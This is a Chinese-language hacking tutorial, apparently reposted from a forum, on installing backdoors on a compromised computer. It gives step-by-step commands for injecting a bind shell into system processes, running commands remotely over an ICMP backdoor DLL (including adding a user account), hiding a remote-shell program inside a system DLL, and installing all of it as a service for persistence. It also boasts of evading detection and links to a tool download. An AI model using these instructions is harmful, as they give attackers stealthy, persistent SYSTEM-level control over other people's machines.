一. 应用
　　
　　1.在系统进程中插入SHELL
　　先上传InjShell.exe 到肉鸡
　　用法：
　　先查一下系统进程 用PSLIST.EXE PV.EXE 等查
　　一般有SMSS.EXE internat.exe svchost.exe conime.exe 等
　　InjShell.exe （进程.EXE） SHELLPORT
　　如 InjShell.exe internat.exe 1234
　　成功后 telnet ip 1234
　　就可以的到一个SYSTEM的CMD SHELL ！
　　非常不错的后门，由于是系统进程所以很难被发现，也不会被查杀
　　随系统启动。
　　-----------------
　　
　　2.在系统进程插入DLL
　　用法：
　　InjDll.exe （系统进程.EXE ） ICMP.DLL（后门DLL）
　　然后用客户端 IcmpReplySend.exe IP CMD
　　如IcmpReplySend.exe 127.0.0.1 “net user czh /add"
　　这样我们随时可以远程运行命令（SYSTEM权限的）并且是采用ICMP通讯，不开PORT，安全，可*，隐密！
　　刚完成测试，很不错 ，不过ICMP封包是名文的，用IRis抓到
　　-------------------------
　　3.在DLL中插入EXE
　　用法：SetDll.exe
　　如 SetDll.exe NCX99.EXE NTDLL.DLL （为系统进程必用DLL库文件）
　　然后telnet 127.0.0.1 99
　　这样NCX99.EXE就不出现在进程中。
　　----------------------------------------------------
　　----------------------------------------------------
　　二.补充：经测试后有一个问题，重启后不能再用，不过我想了一个办法，如下：
　　用ntservice.exe 把这几个文件安装成服务启动，方法如下 ：
　　
　　1.建一个ntservice.ini文件,内容如下：
　　[Settings]
　　ServiceName = NTService （这行代表服务名）
　　LogEnable = 0
　　ProcCount = 1
　　[Process0]
　　CommandLine =system.bat （这行代表服务所要启动的文件）
　　PauseStart = 1000
　　PauseEnd = 1000
　　UserInterface = No （这行代表后台运行）
　　=========================================
　　2.建一个system.bat文件如下：
　　echo off
　　InjDll.exe svchost.exe IcmpAttach.dll
　　
　　InjShell internat.exe 1234
　　
　　SetDll.exe NCX99.EXE NTDLL.DLL
　　========================================
　　3.把以上的InjDll.exe ，IcmpAttach.dll， ntservice.exe ，SetDll.exe， NCX99.EXE，
　　ntservice.ini， system.bat 全部COPY到肉鸡 的WINNT\SYSTEM32文件夹中。
　　=======================================
　　4. 安装：
　　ntservice.exe -install
　　net start ntservice
　　
　　然后你就可以用这几个后门了，开机就能启动了！
　　===========================================
　　5.卸载
　　net stop ntservice
　　ntservice.exe -remove
　　==========================================
　　6.由于把SYSTEM.BAT加入到RUN键中开机会有CMD窗口，所以选择了安装成服务启动。
　　
　　
　　软件下载地址
　　http://dvbbs.aspai.com/soft/door.zip
　　

文章转载地址:http://www.cnpaf.net/Class/hack/06101110491764127491.html